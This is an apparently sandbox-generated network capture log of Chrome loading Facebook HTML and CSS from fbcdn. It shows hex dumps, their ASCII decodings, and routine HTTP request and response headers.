                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 61 67 65 73 2f 66 62 5f 69 63 6f 6e 5f 33 32 35 78 33 32 35 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 6d 65 64 69 61 3d 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 6d 65 64 69 61 3d 22 68 61 6e 64 68 65 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                                                  Data Ascii: ages/fb_icon_325x325.png" /><meta property="og:locale" content="ru_RU" /><link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/" /><link rel="alternate" media="handheld" href="https://m.facebook.com/" /><meta name="
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4d 2f 6c 2f 30 2c 63 72 6f 73 73 2f 38 4b 39 63 49 33 6e 51 72 30 6a 2e 63 73 73 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 36 32 46 79 34 53 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 31 2f 72 2f 73 31 6f
                                                                                                                                                                                                                                  Data Ascii: rigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css" data-bootloader-hash="62Fy4Se" crossorigin="anonymous" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/s1o
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 72 75 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 34 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 35 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 35 31 22 3a 7b 22 72 65 73 75 6c 74 22
                                                                                                                                                                                                                                  Data Ascii: rue,"hash":null},"20985":{"result":false,"hash":null},"20986":{"result":false,"hash":null},"20987":{"result":false,"hash":null},"20988":{"result":true,"hash":null},"21043":{"result":false,"hash":null},"21050":{"result":false,"hash":null},"21051":{"result"
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 33 36 32 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 35 32 36 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 35 33 38 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 35 34 33 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 31 30 32 38 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 31 37 35 32 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 2c 22 6a 75 73 74 6b 6e 6f 62 78 44 61 74 61 22 3a 7b 22 31 34 34 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 34 35 30 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 31 32 30 33 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 31 34 31 37 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 31 38 30 36 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 32 32 36 39 22 3a
                                                                                                                                                                                                                                  Data Ascii: esult":false,"hash":null}},"qexData":{"362":{"r":null},"526":{"r":null},"538":{"r":null},"543":{"r":null},"1028":{"r":null},"1752":{"r":null}},"justknobxData":{"144":{"r":true},"450":{"r":true},"1203":{"r":true},"1417":{"r":true},"1806":{"r":true},"2269":
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 36 36 39 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 53 65 72 76 65 72 4e 6f 6e 63 65 22 2c 5b 5d 2c 7b 22 53 65 72 76 65 72 4e 6f 6e 63 65 22 3a 22 46 6a 63 66 37 49 56 52 45 72 53 62 7a 56 58 35 64 4e 76 62 6c 75 22 7d 2c 31 34 31 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 43
                                                                                                                                                                                                                                  Data Ascii: ventProfilerImpl",null]},-1],["cr:135",["RunBlue"],{"__rc":["RunBlue",null]},-1],["cr:6669",["DataStore"],{"__rc":["DataStore",null]},-1],["ServerNonce",[],{"ServerNonce":"Fjcf7IVRErSbzVX5dNvblu"},141],["KSConfig",[],{"killed":{"__set":["POCKET_MONSTERS_C
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 2c 22 74 65 6e 6f 72 5f 6d 65 64 69 61 22 2c 22 74 69 6b 74 6f 6b 5f 6f 65 6d 62 65 64 22 2c 22 74 77 69 74 74 65 72 5f 61 6e 61 6c 79 74 69 63 73 5f 70 69 78 65 6c 22 2c 22 74 77 69 74 74 65 72 5f 61 6e 61 6c 79 74 69 63 73 5f 70 69 78 65 6c 5f 69 6d 67 22 2c 22 74 77 69 74 74 65 72 5f 6c 65 67 61 63 79 5f 65 6d 62 65 64 22 2c 22 76 69 6d 65 6f 5f 6f 65 6d 62 65 64 22 2c 22 79 6f 75 74 75 62 65 5f 65 6d 62 65 64 22 2c 22 79 6f 75 74 75 62 65 5f 6f 65 6d 62 65 64 22 2c 22 61 64 76 65 72 74 69 73 65 72 5f 68 6f 73 74 65 64 5f 70 69 78 65 6c 22 2c 22 61 69 72 62 75 73 5f 73 61 74 22 2c 22 61 6d 61 7a 6f 6e 5f 6d 65 64 69 61 22 2c 22 61 70 70 73 5f 66 6f 72 5f 6f 66 66 69 63 65 22 2c 22 61 72 6b 6f 73 65 5f 63 61 70 74 63 68 61 22 2c 22 61 73 70 6e 65 74 5f
                                                                                                                                                                                                                                  Data Ascii: ,"tenor_media","tiktok_oembed","twitter_analytics_pixel","twitter_analytics_pixel_img","twitter_legacy_embed","vimeo_oembed","youtube_embed","youtube_oembed","advertiser_hosted_pixel","airbus_sat","amazon_media","apps_for_office","arkose_captcha","aspnet_


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  19192.168.2.649749157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC604OUTGET /rsrc.php/v3/yG/l/0,cross/sz9JnoPJuhF.css HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: YDTKm8pkP/LnCyvn//h65A==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 11:38:56 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 0Cm4GtK/W3mf8Ss5gzjsApqBYo8ZADRHi0u7Z6AX5M6weTXbRYwH5r08n/5EGLimAXTBb3BjDQ7UXp2Y7dzRvw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:16 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=8, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 536282
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1INData Raw: 2e
                                                                                                                                                                                                                                  Data Ascii: .
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC15878INData Raw: 78 31 38 6c 31 39 6b 64 7b 2d 2d 61 63 63 65 6e 74 3a 76 61 72 28 2d 2d 2d 2d 61 63 63 65 6e 74 2c 72 65 76 65 72 74 29 7d 2e 78 31 62 30 35 38 30 61 7b 2d 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 76 61 72 28 2d 2d 2d 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 2c 72 65 76 65 72 74 29 7d 2e 78 31 69 32 75 67 31 6e 7b 2d 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 2d 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 72 65 76 65 72 74 29 7d 2e 78 31 6f 62 79 6d 71 78 7b 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 76 61 72 28 2d 2d 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2c 72 65 76 65 72 74 29 7d 2e 78 31 76 35 65 32 68 65 7b 2d 2d 73 65 63 6f 6e 64 61 72 79 2d
                                                                                                                                                                                                                                  Data Ascii: x18l19kd{--accent:var(----accent,revert)}.x1b0580a{--primary-text:var(----primary-text,revert)}.x1i2ug1n{--primary-button-background:var(----primary-button-background,revert)}.x1obymqx{--secondary-text:var(----secondary-text,revert)}.x1v5e2he{--secondary-
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 35 74 7b 2d 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 78 31 6c 77 32 6f 63 30 7b 2d 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 74 65 78 74 3a 23 66 66 66 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 31 6d 31 6d 33 39 6e 2d 42 7b 30 25 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 36 2e 33 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 39 30 64 65 67 29 7d 32 35 25 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 32 38 2e 33 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 36 32 64 65 67 29 7d 35 30 25 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 34 2e 31 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 37 32 64 65 67 29 7d 37 35 25
                                                                                                                                                                                                                                  Data Ascii: 5t{--input-background:transparent}.x1lw2oc0{--primary-button-text:#fff}@keyframes x1m1m39n-B{0%{stroke-dashoffset:6.3px;transform:rotate(-90deg)}25%{stroke-dashoffset:28.3px;transform:rotate(162deg)}50%{stroke-dashoffset:14.1px;transform:rotate(72deg)}75%
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 65 72 3a 20 63 6f 61 72 73 65 29 7b 2e 78 31 39 70 7a 73 74 65 2e 78 31 39 70 7a 73 74 65 7b 2d 2d 6e 61 76 2d 6c 69 73 74 2d 63 65 6c 6c 2d 6d 69 6e 2d 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 61 62 72 61 2d 74 6f 75 63 68 2d 6e 61 76 2d 6c 69 73 74 2d 63 65 6c 6c 2d 6d 69 6e 2d 68 65 69 67 68 74 29 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 37 39 70 78 29 7b 2e 78 39 72 7a 63 65 7a 2e 78 39 72 7a 63 65 7a 7b 2d 2d 64 69 61 6c 6f 67 2d 61 6e 63 68 6f 72 2d 76 65 72 74 69 63 61 6c 2d 70 61 64 64 69 6e 67 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 37 39 70 78 29 7b 2e 78 69 6b 79 33 34 63 2e 78 69 6b 79 33 34 63 7b 2d 2d 64 69 61 6c 6f 67 2d 63 6f 72 6e 65 72 2d 72 61 64 69 75 73 3a 30 7d 7d 40 6d 65 64 69
                                                                                                                                                                                                                                  Data Ascii: er: coarse){.x19pzste.x19pzste{--nav-list-cell-min-height:var(--abra-touch-nav-list-cell-min-height)}}@media (max-width: 679px){.x9rzcez.x9rzcez{--dialog-anchor-vertical-padding:0}}@media (max-width: 679px){.xiky34c.xiky34c{--dialog-corner-radius:0}}@medi
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 61 6e 30 64 37 2e 78 36 61 6e 30 64 37 7b 66 6c 65 78 3a 30 20 31 20 61 75 74 6f 7d 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2e 78 70 6e 78 79 62 39 2e 78 70 6e 78 79 62 39 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 78 71 7a 36 68 6d 66 2e 78 71 7a 36 68 6d 66 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 64 69 76 69 64 65 72 29 7d 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 20 61 63 74 69 76 65 29 7b 2e 78 76 65 74 7a 31 39 2e 78 76 65 74 7a 31 39 7b 6f 75 74 6c 69 6e 65 3a 76 61 72 28 2d 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 6f 75 74 6c 69 6e 65 2d 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 29 7d
                                                                                                                                                                                                                                  Data Ascii: an0d7.x6an0d7{flex:0 1 auto}}@media print{.xpnxyb9.xpnxyb9{border-top:none}}@media (max-width: 767px){.xqz6hmf.xqz6hmf{border-bottom:1px solid var(--divider)}}@media (forced-colors: active){.xvetz19.xvetz19{outline:var(--focus-ring-outline-forced-colors)}
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1500INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 78 35 65 64 37 72 66 2d 42 7d 2e 78 31 34 73 66 77 6f 64 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 65 33 31 63 31 64 7d 2e 78 31 34 75 6e 79 30 6f 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 78 31 34 76 30 73 6d 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7d 2e 78 31 34 76 31 72 6a 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 72 65 70 65 61 74 28 32 2c 34 39 2e 30 37 25 29 7d 2e 78 31 34 77 32 62 68 63 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 23 65 62 65 62 65 62 7d 2e 78 31 34 77 69 34 78 77 7b 74 65 78 74 2d 61 6c 69 67 6e
                                                                                                                                                                                                                                  Data Ascii: animation-name:x5ed7rf-B}.x14sfwod{border-right-color:#e31c1d}.x14uny0o{padding-right:15px}.x14v0smp{background-color:var(--button-primary-background)}.x14v1rj{grid-template-columns:repeat(2,49.07%)}.x14w2bhc{border-left-color:#ebebeb}.x14wi4xw{text-align
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC14884INData Raw: 67 73 35 31 7b 63 6f 6c 6f 72 3a 23 61 62 33 62 63 64 7d 2e 78 31 35 62 6a 62 36 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 78 31 35 63 61 6a 62 79 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 5a 28 39 30 64 65 67 29 7d 2e 78 31 35 63 71 61 67 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 38 31 39 31 61 7d 2e 78 31 35 64 31 62 32 6e 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 64 65 65 6d 70 68 61 73 69 7a 65 64 2d 62 75 74 74 6f 6e 2d 74 65 78 74 29 7d 2e 78 31 35 64 36 62 6c 71 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 38 25 7d 2e 78 31 35 64 77 33 79 74 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 32 70 78 20 76 61 72 28
                                                                                                                                                                                                                                  Data Ascii: gs51{color:#ab3bcd}.x15bjb6t{line-height:inherit}.x15cajby{transform:rotateZ(90deg)}.x15cqagf{background-color:#18191a}.x15d1b2n{border-left-color:var(--primary-deemphasized-button-text)}.x15d6blq{margin-right:-8%}.x15dw3yt{box-shadow:inset 0 0 0 2px var(
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 77 3a 30 20 2d 38 70 78 20 38 70 78 20 76 61 72 28 2d 2d 63 61 72 64 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7d 2e 78 31 39 6d 76 67 68 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 76 61 72 28 2d 2d 61 6c 77 61 79 73 2d 64 61 72 6b 2d 6f 76 65 72 6c 61 79 29 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 7d 2e 78 31 39 6e 32 72 77 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 32 70 78 20 76 61 72 28 2d 2d 61 63 63 65 6e 74 29 7d 2e 78 31 39 6e 70 64 73 68 7b 63 6f 6c 75 6d 6e 2d 67 61 70 3a 32 2e 38 36 25 7d 2e 78 31 39 6e 71 67 39 39 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 46 61 63 65 62 6f 6f 6b 20 53 61 6e 73 20 41 70 70 20 48 65 61 76 79 21 69 6d 70 6f 72 74 61 6e 74 7d 2e
                                                                                                                                                                                                                                  Data Ascii: w:0 -8px 8px var(--card-background)}.x19mvghd{background-image:linear-gradient(180deg,var(--always-dark-overlay),transparent)}.x19n2rwr{box-shadow:0 0 0 2px var(--accent)}.x19npdsh{column-gap:2.86%}.x19nqg99{font-family:Facebook Sans App Heavy!important}.
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 75 7b 66 6c 65 78 2d 67 72 6f 77 3a 2e 39 32 7d 2e 78 31 65 66 74 6f 6f 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 35 72 65 6d 7d 2e 78 31 65 67 34 39 70 37 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 69 63 6f 6e 29 7d 2e 78 31 65 67 62 69 75 30 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 64 65 65 6d 70 68 61 73 69 7a 65 64 2d 62 75 74 74 6f 6e 2d 70 72 65 73 73 65 64 29 7d 2e 78 31 65 67 6a 6b 6a 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 65 63 6f 6e 64 61 72 79 2d 68 6f 76 65 72 29 7d 2e 78 31 65 67 6a 79 6e 71 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 38 70 78 7d 2e 78 31 65
                                                                                                                                                                                                                                  Data Ascii: u{flex-grow:.92}.x1eftoo1{font-size:.5rem}.x1eg49p7{border-left-color:var(--secondary-icon)}.x1egbiu0{background-color:var(--primary-deemphasized-button-pressed)}.x1egjkj9{background-color:var(--background-secondary-hover)}.x1egjynq{padding-left:18px}.x1e
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC14884INData Raw: 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 66 64 62 33 32 61 7d 2e 78 31 6a 70 67 68 39 35 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 78 31 6a 70 6c 6a 6d 76 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 61 72 6f 75 6e 64 7d 2e 78 31 6a 71 30 61 67 77 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 32 38 70 78 7d 2e 78 31 6a 71 6c 31 6b 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 33 70 78 7d 2e 78 31 6a 71 6c 65 72 61 7b 6c 65 66 74 3a 37 30 25 7d 2e 78 31 6a 71 79 6c 6b 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 78 31 6a 72 63 6d 38 35 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 78 31 39 34 31 6d 6c 72 2d 42 7d 2e
                                                                                                                                                                                                                                  Data Ascii: der-right-color:#fdb32a}.x1jpgh95{transform-origin:center center}.x1jpljmv{align-content:space-around}.x1jq0agw{border-bottom-left-radius:28px}.x1jql1k0{margin-left:-23px}.x1jqlera{left:70%}.x1jqylkn{margin-right:15px}.x1jrcm85{animation-name:x1941mlr-B}.


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  20192.168.2.649745157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC604OUTGET /rsrc.php/v3/yy/l/0,cross/_PStGDb9Db2.css HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: q2RsNBm0lNDw66XgqoiE6w==
